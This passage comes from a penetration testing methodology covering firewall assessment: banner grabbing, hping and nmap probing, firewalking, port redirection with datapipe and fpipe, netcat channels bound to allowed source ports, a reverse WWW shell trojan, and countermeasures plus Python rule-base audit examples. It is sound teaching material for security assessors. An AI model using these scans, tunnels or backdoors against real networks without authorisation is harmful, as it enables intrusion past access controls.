To prevent port scans against the firewall, block them on the gateway router itself. In the case of
Cisco, use the following to block scans against the default ports of a Check Point Firewall-1
system (256 = FW1 management, 257 = logging, 258 = management GUI, 259 = client
authentication):
access-list 101 deny tcp any any eq 256 log
access-list 101 deny tcp any any eq 257 log
access-list 101 deny tcp any any eq 258 log
access-list 101 deny tcp any any eq 259 log
Use a "stealth" rule on the firewall which blocks all traffic towards the firewall itself, placed
before any rule that could match it.
Also use a detection mechanism to catch stealthy scans: tune your Network Intrusion Detection
System to detect slow scans. Adjust the trigger (x ports in y time for a port scan, x hosts in y time
for a host sweep); note that it may trigger false positives.
Disable all default ports on the firewall that are not required for its operation.
Tool[s]
• Nmap
• hping
Further Reading[s]
For the Firewall Default Port Table Refer to the Appendix
Remarks
L.9.5 Perform Port Scan on Default Firewall Ports and Grab Banners – Banner Grabbing
Description
• A banner can tell what type and version of a service is in use
• It can reveal the operating system version that is running
• A banner can be read by connecting to the service (e.g. FTP, SMTP, web)
Firewall proxies have a history of information leakage: they often reveal their type and version.
Pre-requisite[s]
• Banner grabber
• Target IP addresses / host name / domain name
• Access to the service
Steps to be performed
Connect with telnet or netcat to the corresponding port and watch the replies.
Examples/Results
Example 1
grabbb -s -t 10 -a xxx.xxx.xxx.xxx -b xxx.xxx.xxx.xxx -m -v -t <port number of the service>
Example 2
#nc -vv -n 192.168.0.1 257
(UNKNOWN) [192.168.0.1] 257 (?) open 31000000
Example 3: Check Point FW-1 Client Authentication
#nc -vv -n 192.168.0.1 259
(UNKNOWN) [192.168.0.1] 259 (?) open
Check Point Firewall-1 Client Authentication Server running on dev-fwcoreprimus
Example 4: Symantec Enterprise Firewall 8.0 Telnet Proxy
C:\> telnet 192.168.0.1
Secure Gateway.
Hostname:
Hostname:
Example 5: Symantec Enterprise Firewall 8.0 HTTP Proxy
C:\>nc -nvv 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 503 Service Unavailable
MIME-Version: 1.0
Server: Simple, Secure Web Server 1.1
Date: Fri, 17 Sep 2004 19:08:35 GMT
Connection: close
Content-Type: text/html
<HTML>
<HEAD><TITLE>Firewall Error: Service Unavailable</TITLE></HEAD>
Analysis/Conclusion/Observation
Tool[s]
NetCat, Grabbb, Languard, telnet
Countermeasures
• Remove or change the default banner of the firewall
• Block firewall/router default ports at the border router
Further Reading[s]
For the Firewall Default Port Table Refer to the Appendix
Remarks
Note: the first rule of a firewall rulebase denies everything to the firewall except from the
management station, so generally one is not going to get much from this.
L.9.6 Custom Packets
Description
Creating custom packets that are sent towards the firewall can elicit unique responses from
the firewall. This can also be used to determine the type of firewall.
Examples/Results – One – SYN packet and RST / ACK
hping 192.168.0.1 -c 2 -S -p 23 -n
HPING 192.168.0.1 (eth0 192.168.0.1): S set, 40 data bytes
60 bytes from 192.168.0.1: flags=RA seq=0 ttl=59 id=0 win=0 time=0.4 ms
Analysis/Conclusion/Observation
1. We get RST / ACK packets back, which indicates either:
• The packet passed through the firewall and the port was closed on the target (192.168.0.1), or
• The firewall rejected the packet with a forged RST / ACK
2. When performing this against Check Point FW-1, hping shows the source IP of the target
(192.168.0.1) although FW-1 itself generated the reset (only if the firewall is allowed to send out
packets originating from the firewall).
3. The TTL of the RST / ACK should tell which host really sent it: a reset generated by the
firewall arrives with a different TTL from packets generated by the target (compare it with the
TTL of a SYN / ACK from a port known to be open).
Examples/Results – Two – SYN packet and no response
hping 192.168.0.1 -c 2 -S -p 23 -n
HPING 192.168.0.1 (eth0 192.168.0.1): S set, 40 data bytes
Analysis/Conclusion/Observation
1. In this example we do not receive any response back. This means either:
• The firewall dropped the packet, or
• The packet was lost on the wire
2. If the result repeats, it indicates a firewall that drops packets instead of rejecting them.
Tool[s]
Countermeasures
Prevent the border router from sending administratively prohibited messages (ICMP type 3
code 13):
• For Cisco: "no ip unreachables" on the interface
• Refer to the product manual for other platforms
Further Reading[s]
Remarks
L.9.7 Access Control List Enumeration
Description
Nmap does a good job on this front: it can tell you which ports are in a blocked state. The port
states relevant here are open, closed, filtered and unfiltered:
• Open – the port is listening (a SYN probe is answered with SYN/ACK)
• Closed – the probe reached the host but nothing is listening (answered with RST/ACK)
• Filtered – the port is blocked by an access control device (router/firewall)
• Unfiltered – reported by the ACK scan only: the probe passed the access control device and
the host answered with RST, but an ACK scan cannot tell whether the port is open or closed
How does Nmap decide that a port is filtered?
It is based on two criteria:
1. No response at all, i.e. neither a SYN/ACK nor a RST/ACK packet (after retries)
2. An ICMP destination unreachable message (type 3) with code 13, or another unreachable code
Pre-requisite[s]
• Scanning tool: nmap
• Destination host domain name / IP address
Examples/Results – Nmap ACK scan
#nmap -sA 192.168.0.1
Interesting ports on 192.168.0.1:
(The 65530 ports scanned but not shown below are in state: filtered)
PORT      STATE      SERVICE
110/tcp   UNfiltered pop-3
13701/tcp UNfiltered VeritasNetbackup
13711/tcp UNfiltered VeritasNetbackup
13721/tcp UNfiltered VeritasNetbackup
13782/tcp UNfiltered VeritasNetbackup
Nmap run completed -- 1 IP address (1 host up) scanned in 12205.371 seconds
Analysis/Conclusion/Observation
The output shows that traffic to these five ports passes the access control device (firewall/router)
and reaches the host, which answers with RST; the ACK scan cannot tell whether the ports are
actually open, so follow up with a SYN scan of these ports. Every other port is filtered by the
access control device.
Examples/Results –
#nmap -p 20,21,22,23,53,80,110,111 -n -P0 -vv <target>
While performing this nmap scan, run tcpdump simultaneously to see the responses coming from
the firewall gateway.
Analysis/Conclusion/Observation
Device in above example seems to be a firewall
Examples/Results – Three – Nmap FIN Scan
5145/tcp open rmonitor_secure
5190/tcp open aol
5191/tcp open aol-1
5192/tcp open aol-2
5193/tcp open aol-3
5232/tcp open sgi-dgl
5236/tcp open padl2sim
5300/tcp open hacl-hb
5301/tcp open hacl-gs
Analysis/Conclusion/Observation
• FIN scan results are unreliable and give a lot of false positives: a port reported "open" by a
FIN scan means only that no RST came back, which is also what a dropping firewall produces
(and Windows hosts answer RST regardless of the port state)
Tool[s]
Nmap, tcpdump
Countermeasures
Prevent the border router from sending administratively prohibited messages (ICMP type 3
code 13):
• For Cisco: "no ip unreachables" on the interface
• Refer to the product manual for other platforms
Further Reading[s]
Remarks
L.9.8 Identify Firewall Architecture
Description
hping is a very good tool for custom packet crafting. It allows the assessor to distinguish open
ports from blocked (rejected) and dropped packets.
Using an nmap ACK scan to an open and a closed port of a system behind the firewall (together
with a sniffer), one can detect the type of firewall in use (packet filter, stateful firewall or proxy
firewall).
Pre-requisite[s]
Steps to be performed
1. Run Nmap and start a network Sniffer simultaneously
Examples/Results
#nmap -p 20,21,22,23,53,80,110,111 -n -P0 -vv <server-behind-firewall>
# nmap -sA -p 1,80 <server-behind-firewall>
Analysis/Conclusion/Observation
In the sniffer output, look for RST packets. An ACK scan of a server that is directly reachable
(or behind a stateless packet filter that permits "established" traffic) shows a RST for both the
open and the closed port, because the host has no connection matching the unsolicited ACK. A
server protected by a stateful firewall shows no RST at all, because the firewall drops ACKs that
belong to no tracked connection. An ICMP administratively prohibited message instead of
silence points to a packet filter that rejects. A proxy firewall terminates connections itself, so any
responses come from the proxy rather than from the server (compare the TTLs).
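The reasoning of the two hping examples and of the ACK-scan test, as an added example that is not part of ISSAF, hping or nmap: each probe observation (what was sent, what came back, from which address, with which TTL) is turned into the verdict the text draws. For SYN probes that is open, closed, rejected (ICMP type 3 code 13), dropped, or a reset forged by an upstream device, detected by comparing the reset's TTL with the TTL of a packet known to come from the target; for ACK probes to one open and one closed port it is stateless versus stateful filtering. The observations, the Observation record type and the response labels ("SYN/ACK", "RST/ACK", "RST", "ICMP3/13", "NONE") are this example's own.

```python
"""Probe-response interpretation for firewall identification. Added example, not
part of ISSAF, hping or nmap; observations and labels are constructed."""
from dataclasses import dataclass
from typing import Optional

SYN_ACK, RST_ACK, RST, ADMIN_PROHIBITED, NONE = "SYN/ACK", "RST/ACK", "RST", "ICMP3/13", "NONE"


@dataclass(frozen=True)
class Observation:
    probe: str                  # "SYN" or "ACK"
    port: int
    response: str               # one of the labels above
    src: Optional[str] = None   # source address of the answer
    ttl: Optional[int] = None   # TTL of the answer as received


def interpret_syn(obs, target_ttl=None):
    """(verdict, explanation) for one SYN probe. target_ttl is the TTL of a packet
    known to come from the target itself, e.g. the SYN/ACK from an open port."""
    if obs.probe != "SYN":
        raise ValueError("interpret_syn expects a SYN probe")
    if obs.response == SYN_ACK:
        return "open", f"port {obs.port}: passed the filter, service listening"
    if obs.response == ADMIN_PROHIBITED:
        return "rejected", f"port {obs.port}: administratively prohibited by {obs.src}, a rejecting filter"
    if obs.response == NONE:
        return "dropped", f"port {obs.port}: no answer, dropped by a filter (or lost)"
    if obs.response == RST_ACK:
        # Each hop decrements TTL by one, so a reset forged by a device closer to us
        # arrives with a TTL different from the target's own packets.
        if target_ttl is not None and obs.ttl is not None and obs.ttl != target_ttl:
            return "upstream-reset", (f"port {obs.port}: RST/ACK arrived with TTL {obs.ttl} while "
                                      f"target packets arrive with TTL {target_ttl}: forged upstream")
        return "closed", f"port {obs.port}: reached the target, nothing listening"
    raise ValueError(f"unknown response {obs.response!r}")


def infer_filter_type(ack_probes):
    """(verdict, explanation) from ACK probes to one open and one closed port."""
    responses = {o.response for o in ack_probes}
    if responses == {RST}:
        return "stateless", ("RST for every unsolicited ACK: no firewall, or a stateless packet "
                             "filter that permits established traffic")
    if responses == {NONE}:
        return "stateful", "no RST at all: a stateful firewall drops ACKs matching no connection"
    if ADMIN_PROHIBITED in responses:
        return "rejecting-filter", "ACKs answered with ICMP type 3 code 13: a packet filter that rejects"
    passed = sorted(o.port for o in ack_probes if o.response == RST)
    return "partial", f"RST only for ports {passed}: the filter permits ACKs to those ports only"


# Constructed observations against a target whose SYN/ACK on port 80 arrived with TTL 59.
TARGET_TTL = 59
SYN_OBSERVATIONS = [
    Observation("SYN", 80, SYN_ACK, src="192.168.0.1", ttl=59),
    Observation("SYN", 23, RST_ACK, src="192.168.0.1", ttl=59),        # genuinely closed
    Observation("SYN", 22, RST_ACK, src="192.168.0.1", ttl=60),        # forged one hop nearer
    Observation("SYN", 21, ADMIN_PROHIBITED, src="192.168.100.100"),   # rejecting filter
    Observation("SYN", 25, NONE),                                      # dropping filter
]
ACK_STATELESS = [Observation("ACK", 80, RST), Observation("ACK", 1, RST)]
ACK_STATEFUL = [Observation("ACK", 80, NONE), Observation("ACK", 1, NONE)]


def verdicts(observations, target_ttl=TARGET_TTL):
    return {o.port: interpret_syn(o, target_ttl)[0] for o in observations}


if __name__ == "__main__":
    print(verdicts(SYN_OBSERVATIONS))
    print(infer_filter_type(ACK_STATELESS)[0], infer_filter_type(ACK_STATEFUL)[0])
```

The TTL comparison assumes the forging device and the target are at different distances from you; equal TTLs do not prove the target sent the reset (a firewall one hop in front of the target that also starts from a smaller initial TTL could coincide), whereas a mismatch is reliable. Take the reference TTL from a SYN/ACK, never from a RST, since the RST is the packet under suspicion.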
Tool[s]
Nmap, tcpdump (or any other sniffer)
Countermeasures
• Remove or change the default banner of the firewall
• Block firewall/router default ports at the border router
Further Reading[s]
Remarks
Note: the first rule of a firewall rulebase denies everything to the firewall except from the
management station, so generally one is not going to get much from this.
L.10 IDENTIFY COMMON MISCONFIGURATION[S]
All tests mentioned in the Router Misconfiguration section apply.
L.11 FIREWALL RULE-SET MAPPING
L.11.1 Firewalking
Description
Firewall rulebase misconfiguration / rule-set mapping is done using firewalk and hping. Firewalk
can be used to discover which ports are permitted through a firewall and so to map its access
control list.
• Helps determine which ports are open through a firewall (packet filter)
• The port scan (TCP and UDP) is done with packets whose TTL is set to one greater than the
hop count of the filtering device
  o If an ICMP TTL exceeded message comes back, the port is permitted through
  o If nothing comes back, the port is filtered
Nmap can differentiate between what is open on the end machine and what is being firewalled
(open => open on the end machine, closed => closed on the end machine, filtered => blocked on
the firewall). This is true for packet filters and stateful filters only.
Firewalk determines whether a given port is allowed through a firewall:
• Traceroute to any machine behind the firewall, or to the router before the firewall
• Once the hop count of the filtering device is known, set the TTL of the probe packets to one
more than that hop count and perform a port scan through the firewall
• If a "TTL exceeded" error comes back, the port is allowed through the firewall; the message is
generated by the first hop behind the firewall, so there must be a device beyond it to expire
the packet
Firewalk often provides unpredictable results and sometimes you may face problems while
compiling it. It has a GUI version.
Pre-requisite[s]
• Hop before the access control device
• Hop after the access control device
Steps to be performed
Examples/Results
Source IP      Destination IP     Service                       Flag / Port   Result   Remarks
192.168.0.1    192.168.100.100    TCP Port Service Multiplexer  TCP 1         Drop
192.168.0.1    192.168.100.101    Compressnet                   TCP 2         Drop
192.168.0.1    192.168.100.102    ftp-data                      TCP 20        Drop
192.168.0.1    192.168.100.103    File Transfer [Control]       TCP 21        Drop
192.168.0.2    192.168.100.104    SSH                           TCP 22        Drop
192.168.0.2    192.168.100.105    Telnet                        TCP 23        Drop
192.168.0.2    192.168.100.106    SMTP                          TCP 25        Accept
192.168.0.2    192.168.100.107    HTTP                          TCP 80        Accept
192.168.0.2    192.168.100.108    HTTP                          TCP 80        Drop
Analysis/Conclusion/Observation
Tool[s]
• hping
• firewalking
Countermeasures
• Don’t allow the firewall to send out packets before the drop rule (the last rule in a “good” firewall rulebase)
• Don’t allow the firewall to send out ICMP error messages
Further Reading[s]
Remarks
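The results table above, read as an added example that is not part of ISSAF: the probe verdicts are grouped by source and service to produce an inferred rule-set map, and a service accepted to one host but dropped to another is flagged as a per-host rule to verify against policy (that reading is this example's, not a feature of firewalk or hping).

```python
"""Build an inferred rule-set map from firewalk/hping probe results.

Added example, not part of ISSAF. PROBES is constructed from the L.11.1
Examples/Results table; grouping verdicts by source and service, and treating
a mixed Accept/Drop verdict as evidence of a per-host rule, is this example's
own reading of such a table.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Probe:
    src: str
    dst: str
    service: str
    proto: str
    port: int
    result: str  # "Accept" or "Drop"


PROBES = [
    Probe("192.168.0.1", "192.168.100.100", "TCP Port Service Multiplexer", "TCP", 1, "Drop"),
    Probe("192.168.0.1", "192.168.100.101", "Compressnet", "TCP", 2, "Drop"),
    Probe("192.168.0.1", "192.168.100.102", "ftp-data", "TCP", 20, "Drop"),
    Probe("192.168.0.1", "192.168.100.103", "File Transfer [Control]", "TCP", 21, "Drop"),
    Probe("192.168.0.2", "192.168.100.104", "SSH", "TCP", 22, "Drop"),
    Probe("192.168.0.2", "192.168.100.105", "Telnet", "TCP", 23, "Drop"),
    Probe("192.168.0.2", "192.168.100.106", "SMTP", "TCP", 25, "Accept"),
    Probe("192.168.0.2", "192.168.100.107", "HTTP", "TCP", 80, "Accept"),
    Probe("192.168.0.2", "192.168.100.108", "HTTP", "TCP", 80, "Drop"),
]


def group_verdicts(probes):
    """Map (src, proto, port, service) -> {result: sorted list of destinations}."""
    groups = defaultdict(lambda: defaultdict(set))
    for p in probes:
        groups[(p.src, p.proto, p.port, p.service)][p.result].add(p.dst)
    return {key: {r: sorted(d) for r, d in v.items()} for key, v in groups.items()}


def infer_rules(probes):
    """One line per (source, service): the verdict, or a per-host split when verdicts disagree."""
    lines = []
    for (src, proto, port, service), verdicts in sorted(group_verdicts(probes).items()):
        if len(verdicts) == 1:
            result, dsts = next(iter(verdicts.items()))
            lines.append(f"{src} -> {proto}/{port} ({service}): {result} for {len(dsts)} destination(s)")
        else:
            lines.append(f"{src} -> {proto}/{port} ({service}): Accept to {verdicts.get('Accept', [])}, "
                         f"Drop to {verdicts.get('Drop', [])} [per-host rule, verify against policy]")
    return lines


def accepted_services(probes):
    """Services the filter let through to at least one destination (what the rule-set exposes)."""
    return sorted({(p.proto, p.port, p.service) for p in probes if p.result == "Accept"})


if __name__ == "__main__":
    print("\n".join(infer_rules(PROBES)))
```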
L.11.2 Hpinging
Description
Firewall rule-base misconfiguration / rule-set mapping can be done using hping.
• Helps determine open ports on a firewall (packet filter)
• Port scan (TCP & UDP) done with packets whose TTL is set one greater than the hop count of the filtering device.
o If a TTL error message comes back, the port is open
o If nothing comes back, the port is filtered
• Traceroute to any machine behind the firewall or to the router before the firewall
• Once the hop count of the router is known, we can set the TTL value of our IP packets to one more than the hop count of the router and perform a port scan on the firewall.
• Thus, if a “TTL exceeded” error comes back, the port on the firewall is open
Hping is mostly used for firewall detection purposes.
Pre-requisite[s]
• Traceroute dump towards the target(s)
Steps to be performed
• Hping towards the gateway
• Hping towards the firewall
• Hping towards the system behind the firewall
Examples/Results
# hping -S -c 1 -p <port> <IP Address> -t <TTL>
• port is an open port on the system behind the firewall (find it with port scanning)
• IP Address is the system you are hpinging (the system behind the firewall)
• TTL is the hop count of the system you are hpinging
Analysis/Conclusion/Observation
In the second step, you could receive an ICMP error message back from the firewall with its IP address (in badly configured firewalls).
Tool[s]
hping
Countermeasures
To prevent your firewall from sending out its IP address, restrict your firewall from sending out packets.
Further Reading[s]
Remarks
L.12 PORT REDIRECTION
Description
• If an assessor failed to get direct access to a port, port redirection is his best friend. It is used to bypass port filtering.
• Install a port redirector and make it listen on a selected port number
• Packets received on the listening port number are forwarded to the desired port on the remote host
Examples/Results
Assessor with WinXP machine - 192.168.10.10
c:> net use \\192.168.10.20\ipc$ abctest /u:administrator
Assessor with Linux machine - 192.168.10.20
# datapipe 139 80 192.168.10.30
NT/Unix host - 192.168.10.30
fpipe -l 80 -r 139 192.168.10.40
or
datapipe 80 139 192.168.10.40
Windows XP victim - 192.168.10.40
Wait for connections
Analysis/Conclusion/Observation
• An open, crystal clear channel can be established between differing operating systems
• Access control devices can be circumvented if device access control lists (ACLs) do not block all the ports
Countermeasures
• Allow traffic based on a services access policy. A services access policy clearly defines what traffic is allowed into the network and what traffic is allowed out of the network; everything else is denied. Authenticate outbound traffic as per your policy.
• Have a policy to review logs
• Implement network and host based intrusion detection systems
Tool[s]
Datapipe – datapipe-1.0.tar.gz
Netcat – http://www.atstake.com/research/tools/index.html
Fpipe – http://www.foundstone.com
Further Reading[s]
Remarks
This works for packet filters and stateful inspection firewalls but NOT for proxy level firewalls!!
L.13 FIREWALL BACKDOORS
L.13.1 Covert Channels
Covert channels are a subliminal channel of communication which hides the fact that a message is being passed. It is not encryption, it is concealment.
Note: There is no explicit specification for the number of simultaneous channels on a given port, but in the vast majority of the systems on the Internet it is limited to 1024.
Hiding in plain sight
• Embedding a message within a regular communication channel
o E.g. embed data in the payload of a ‘ping’ (ICMP) packet
• Only the sender and receiver understand the hiding technique
• A covert channel may be defined as any communication channel that can be exploited by a process to transfer information in a manner that violates a system's security policy.
More Sophisticated Methods
• Utilize TCP/IP header fields
• 6 bits reserved in the TCP header for future use
• Usually not examined by security mechanisms
Refer to the ISSAF Methodology section for more details on Covert Channels.
L.13.2 Filters
Daemon Shell-UDP. Bind to an allowed source port (e.g. 20)
Steps to be performed:
Step 1:
On the Assessor machine type the following:
#nc -p 25 <target system IP address> 5000
Step 2:
On the Target system type the following:
#nc -l -v -n -p 5000
L.13.3 Stateful Filters
• Reverse telnets
• Tunnel from Phrack 52
• ssh with the -R option
• ssh with the -L option
L.13.4 Application Level Firewalls
Reverse www shell
• It allows an assessor to access a machine on your internal network from the outside
• It simply looks like an internal user is browsing the web.
• Its entire traffic is base64 encoded
• It runs at specific times (slave) in a day
• The assessor needs to install a simple Trojan program on a machine in your network, the Reverse WWW shell server.
• The Reverse WWW shell server spawns a back channel to the master
• As the assessor types into the master system, the command is retrieved and executed on the target system.
L.14 COUNTERMEASURES
• Allow traffic based on a services access policy. A services access policy clearly defines what traffic is allowed into the network and what traffic is allowed out of the network; everything else is denied. Authenticate outbound traffic as per your policy. (For example: web servers should not be able to connect to the Internet …)
• Use application proxies; it is difficult to establish back channels when they are in use. But of course it is not impossible.
L.15 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose the entire network, no matter how secure your perimeter network is.
Security between remote users/sites and the enterprise network only secures the link between them. What if the remote users/sites themselves are compromised?
The assessor should try to compromise remote users, telecommuters and/or remote sites of an enterprise. It will give privileged access to the internal network.
Countermeasure
• Implement proper security at remote sites.
• Use a desktop firewall on remote users’ desktops and telecommuter laptops, preferably a centrally managed desktop firewall solution which cannot be disabled by the users.
• Implement host based intrusion detection and prevention mechanisms on remote users’ desktops and telecommuter laptops.
• Have a separate access control policy for remote users/telecommuters and/or remote sites.
Examples:
• Cyberarmor
• Checkpoint SecureClient
• Symantec Client Security / Symantec VPN Client
L.16 TEST PRODUCT SPECIFIC ISSUES
L.16.1 Access Control List (ACL) Issues and Source Port Scanning
• In many implementations it is common to find that access control devices simply allow excessive traffic in or out.
• It is easy for an attacker to scan the target network by choosing one of the following source ports:
o 20 – FTP Data
o 25 - SMTP
o 53 - DNS
o 80 - Web
o 110 – POP3
o 1024 and above
#nmap -sS <target IP address> -g20
• Beware – nmap with the -g switch misses open ports!
The -g switch is only a request, as per the man page: “Note that this is only a request – nmap will honor it only if and when it is able to”
• Try strobe with the -P switch
Countermeasures
• Allow traffic based on a services access policy. A services access policy clearly defines what traffic is allowed into the network and what traffic is allowed out of the network; everything else is denied.
L.16.2 Checkpoint Firewall-1 Issues
• CheckPoint allows the following ports by default from any host to any host, and no logging is performed on this.
o UDP 53 – DNS Query
o TCP 53 – DNS Zone transfer
o UDP 520 – Routing Information Protocol (RIP)
This is no longer the case for Checkpoint FW-1 NG
• It doesn’t show this in the main rule page. It is part of the implicit rules and the options remain in the global properties (Policy → Properties tab)
Further reading
http://oliver.efri.hr/~crv/security/bugs/Others/fw-5.html
L.16.2.1 STATEFUL INSPECTION SUBTERFUGE
L.16.2.2 CHECKPOINT 4.0 INTER-MODULE AUTHENTICATION WEAKNESS
The CheckPoint 4.0 inter-module authentication weakness exposes the firewall’s other IP addresses. Refer to this for more detail: http://www.dataprotect.com/bh2000
L.16.3 TCP Fast Mode Issues
L.16.4 FWZ Encapsulation Issues
L.16.5 CheckPoint NG Issues
The default open ports are 264 & 18264 (described in more detail in the firewall ports doc)
L.16.6 Nokia IPSO Issues
• HTTP Configuration
o It doesn’t require encryption
o It doesn’t have any Access Control Lists implemented
• Telnet is enabled by default
• Pre-hardened, administrator is probably not worried about security
Countermeasures
• Configure Access Control Lists to administer HTTP
• Configure HTTPS to be used instead of HTTP
• Disable Telnet, use SSH instead
L.16.7 Cisco PIX Issues
L.16.8 Microsoft Proxy Issues
L.16.9 IP Chains Issues
• Linux IP 2.2.0 kernel
o Attacker may bypass packet filtering rules
o Fragmentation Attack
o Rewrite part of the TCP / UDP header
o Port information is rewritten in order to gain access to ports that should be blocked by the firewall
• Fragrouter can be used to launch the attack
Refer to this for more detail: http://www.dataprotect.com/ipchains
L.17 GLOBAL COUNTERMEASURES
• Have a DROP ALL rule (has to be the last rule in your rulebase)
• Have a STEALTH rule (dropping all traffic towards your firewall) – preferably the first rule
• Prevent your firewall from sending out packets originating from the gateway
• Prevent the usage of “ANY” in the rule-base (both for services and for sources and/or destinations)
• Disable or change the default settings of firewalls as much as possible
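An added example, not ISSAF's own code, that audits a rule-base against the L.17 global countermeasures above and the L.16.1 source-port issue; the rule representation, the "firewall" object name standing for the gateway's own addresses, and the sample rules are assumptions of this example.

```python
"""Audit a firewall rule-base against the ISSAF L.17 global countermeasures.

Added example, not ISSAF's own code. The rule representation (plain dicts), the
special name "firewall" (the gateway's own addresses) and SAMPLE_RULEBASE are
constructed for this illustration. Checks performed:
  1. a STEALTH rule (drop everything addressed to the firewall) is first,
  2. a DROP ALL rule is last,
  3. no other rule uses ANY for source, destination or service,
  4. no rule lets the gateway itself originate traffic,
  5. no rule accepts traffic on the strength of its source port (L.16.1).
"""

ANY = "ANY"
FIREWALL = "firewall"  # placeholder object name for the gateway's own addresses


def make_rule(no, src, dst, service, action, src_port=None):
    """Build one rule; src_port is an optional source-port match (the L.16.1 weakness)."""
    return {"no": no, "src": src, "dst": dst, "service": service,
            "action": action, "src_port": src_port}


def is_stealth(rule):
    """STEALTH rule: drop every packet addressed to the firewall itself."""
    return (rule["dst"] == FIREWALL and rule["src"] == ANY
            and rule["service"] == ANY and rule["action"] == "drop")


def is_drop_all(rule):
    """DROP ALL (clean-up) rule: drop whatever no earlier rule matched."""
    return all(rule[k] == ANY for k in ("src", "dst", "service")) and rule["action"] == "drop"


def audit(rulebase):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    if not rulebase:
        return ["rule-base is empty: no STEALTH rule and no DROP ALL rule"]
    if not is_stealth(rulebase[0]):
        findings.append("first rule is not a STEALTH rule (drop all traffic to the firewall)")
    if not is_drop_all(rulebase[-1]):
        findings.append("last rule is not a DROP ALL rule")
    last = len(rulebase) - 1
    for idx, rule in enumerate(rulebase):
        # The two framing rules are the only ones allowed to say ANY.
        if (idx == 0 and is_stealth(rule)) or (idx == last and is_drop_all(rule)):
            continue
        for field in ("src", "dst", "service"):
            if rule[field] == ANY:
                findings.append(f"rule {rule['no']}: uses ANY for {field}")
        if rule["action"] == "accept" and rule["src"] == FIREWALL:
            findings.append(f"rule {rule['no']}: lets the gateway originate packets")
        if rule["action"] == "accept" and rule["src_port"] is not None:
            findings.append(f"rule {rule['no']}: accepts traffic on the basis of source port "
                            f"{rule['src_port']}, which the sender chooses (L.16.1)")
    return findings


# Constructed sample rule-base with deliberate weaknesses.
SAMPLE_RULEBASE = [
    make_rule(1, ANY, FIREWALL, ANY, "drop"),                                 # STEALTH rule
    make_rule(2, "192.168.0.0/24", "192.168.100.106", "TCP/25", "accept"),   # mail, fine
    make_rule(3, ANY, "192.168.100.107", "TCP/80", "accept"),                # ANY source
    make_rule(4, "192.168.0.0/24", "192.168.100.0/24", ANY, "accept",
              src_port="TCP/20"),                                            # ANY service + source-port allow
    make_rule(5, FIREWALL, "192.168.100.0/24", "ICMP", "accept"),            # gateway-originated traffic
    make_rule(6, ANY, ANY, ANY, "drop"),                                     # DROP ALL
]

if __name__ == "__main__":
    for line in audit(SAMPLE_RULEBASE):
        print(line)
```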
L.18 DEFAULT PORTS - FIREWALL
L.18.1.1 SONICWALL
Port        | Service Identified | Available To
TCP/UDP 23  | TELNET             | Private
TCP 67      | BOOTPS             | Private
UDP 69      | TFTP               | Private
TCP 80      | HTTP               | Private
TCP/UDP 137 | NETBIOS            | Private
UDP 500     | ISAKMP             | Private
L.18.1.2 NOKIA
Port       | Service Identified
TCP, 23    | Telnet
TCP, 80    | HTTP
TCP, 256   | FW-1 Management
TCP, 259   | FW-1 Management
TCP, 262   | FW-1 Management
TCP, 900   | FW-1 Management
TCP, 1149  | FW-1 Management
TCP, 1150  | FW-1 Management
TCP, 1151  | FW-1 Management
TCP, 1152  | FW-1 Management
TCP, 1153  | FW-1 Management
TCP, 1154  | FW-1 Management
TCP, 18183 | FW-1 Management
TCP, 18184 | FW-1 Management
UDP, 161   | FW-1 Management
UDP, 259   | FW-1 Management
UDP, 514   | FW-1 Management
Comments: Management purpose; communication between the Nokia appliance and the management server. Open by default.
L.18.1.3 ZYWALL
Port   | Service Identified | Available To
TCP 21 | FTP                | Private
TCP 23 | Telnet             | Private
L.18.1.4 NETASQ
Port     | Service Identified      | Available To
TCP 1300 | NETASQ Firewall Manager | Private
TCP 1302 | NETASQ Firewall Monitor | Private
L.18.1.5 WATCHGUARD SOHO
Port     | Service Identified | Available To
TCP 21   | FTP                | Private
TCP 53   | DNS                | Private
UDP 53   | DNS                | Private
UDP 67   | Bootps             | Private
TCP 80   | HTTP               | Private
TCP 1080 | Socks              | Private
Comments: Ports open by default
L.18.1.6 LUCENT ACCESS POINT 300
Port      | Service Identified | Available To
TCP 22    | SSH                | Private & Public
TCP 23    | Telnet             | Private & Public
TCP 80    | HTTP               | Private & Public
UDP 123   | NTP                | Private & Public
UDP 161   | SNMP               | Private & Public
TCP 443   | HTTPS              | Private & Public
UDP 500   | ISAKMP             | Private & Public
UDP 514   | SYSLOG             | Private & Public
UDP 520   | RIP                | Private & Public
UDP 1701  | L2TP               | Private & Public
UDP 8127  | AP SLA Probe       | Private & Public
UDP 65534 | Loop back Address  | Private & Public
L.18.1.7 WATCHGUARD VCLASS
Port     | Service Identified                                                 | Available To
TCP 22   | SSH                                                                | Private
TCP 23   | Telnet                                                             | Private
UDP 161  | SNMP                                                               | Private
TCP 443  | SSL                                                                | Private
UDP 500  | IKE                                                                | Private
UDP 1024 | Centralized Policy Manager (CPM)                                   | Private
UDP 1850 | Heartbeat to centralized managers                                  | Private
TCP 6789 | Used by HA modules to hot sync configuration between two HA units  | Private
Comments: Ports open by default
L.18.1.8 ZYWALL
Port    | Service Identified           | Available To | Comments
TCP 443 | SSL web based administration | Private      | Used for administration
TCP 443 | SSL web based administration | Public       | Used for administration
L.18.1.9 CISCO IOS FIREWALL
Port     | Service Identified | Available To | Comments
TCP 23   | Telnet             | Private      |
UDP 67   | DHCP               | Private      |
UDP 68   | DHCP               | Private      |
TCP 80   | HTTP               | Private      |
UDP 1985 | HSRP               | Private      |
TCP 443  | HTTPS              | Private      |
ICMP/8   | Echo request       | Private      | Open by default
Comments: Management
L.18.1.10 CISCO PIX FIREWALL
Port     | Service Identified | Available To | Comments
UDP 53   | DNS                | Private      | Open by default
L.18.1.11 BROADCOM FIREWALL
Port     | Service Identified | Available To | Comments
TCP 80   | HTTP               | Private      | Administration/open
ICMP/8   | Echo Request       | Private      | Open by default
ICMP/13  | Timestamp Request  | Private      | Open by default
L.18.1.12 FORTIGATE FIREWALL
Port    | Service Identified           | Available To | Comments
TCP 443 | SSL web based administration | Private      | Administration/open
L.18.1.13 MICROSOFT ISA FIREWALL
Port                 | Service Identified              | Available To
TCP/UDP 135          | RPC Endpoint Mapper             | Private
UDP 137              | NetBIOS name                    | Private
UDP 138              | NetBIOS datagram                | Private
TCP 139              | NetBIOS session                 | Private
TCP/UDP 445          | MS directory service            | Private
UDP 500              | ISAKMP                          | Private
TCP 1025             | Windows internal                | Private
TCP 1080             | Socks                           | Private
